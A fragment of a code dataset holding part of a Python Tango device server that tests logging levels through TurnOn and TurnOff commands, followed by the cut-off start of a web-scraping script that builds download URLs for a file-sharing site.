get_storageLoggingLevel(self):\n return self.__storageLoggingLevel\n\n def set_storageLoggingLevel(self, storageLoggingLevel):\n self.debug_stream(\"In set_StorageLogginglevel\")\n self.__storageLoggingLevel = storageLoggingLevel\n\n if self.__storageLoggingLevel == 1:\n logger.setLevel(logging.FATAL)\n elif self.__storageLoggingLevel == 2:\n logger.setLevel(logging.ERROR)\n elif self.__storageLoggingLevel == 3:\n logger.setLevel(logging.WARNING)\n elif self.__storageLoggingLevel == 4:\n logger.setLevel(logging.INFO)\n elif self.__storageLoggingLevel == 5:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.DEBUG)\n return storageLoggingLevel\n\n @command\n def TurnOn(self):\n # turn on the sending device.\n self.set_state(DevState.ON)\n self.debug_stream(\"TurnOn Sending DEBUG\")\n self.info_stream(\"TurnOn Sending INFO\")\n self.warn_stream(\"TurnOn Sending WARNING\")\n self.error_stream(\"TurnOn Sending ERROR\")\n self.fatal_stream(\"TurnOn Sending FATAL\")\n\n logger.debug(\"TurnOn Sending debug\")\n logger.info(\"TurnOn Sending info\")\n logger.warning(\"TurnOn Sending warn\")\n logger.error(\"TurnOn Sending error\")\n logger.fatal(\"TurnOn Sending fatal\")\n\n @command\n def TurnOff(self):\n # turn off the sending device\n self.set_state(DevState.OFF)\n self.debug_stream(\"TurnOff Sending DEBUG\")\n self.info_stream(\"TurnOff Sending INFO\")\n self.warn_stream(\"TurnOff Sending WARNING\")\n self.error_stream(\"TurnOff Sending ERROR\")\n self.fatal_stream(\"TurnOff Sending FATAL\")\n\n logger.debug(\"TurnOff Sending debug\")\n logger.info(\"TurnOff Sending info\")\n logger.warning(\"TurnOff Sending warn\")\n logger.error(\"TurnOff Sending error\")\n logger.fatal(\"TurnOff Sending fatal\")\n\nrun([Sending])\n","sub_path":"sandbox/logging/Sending.py","file_name":"Sending.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509647434","text":"# coding:utf-8\n# python3 tdmp.py\n# I should stop on \"CutTrack\" for a while\n\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport jsonpickle\nimport re\nimport os\n\nglobal proxyurl\ndownload_template = \"https://trashbox.ru/files20/\"\nregex = r\"(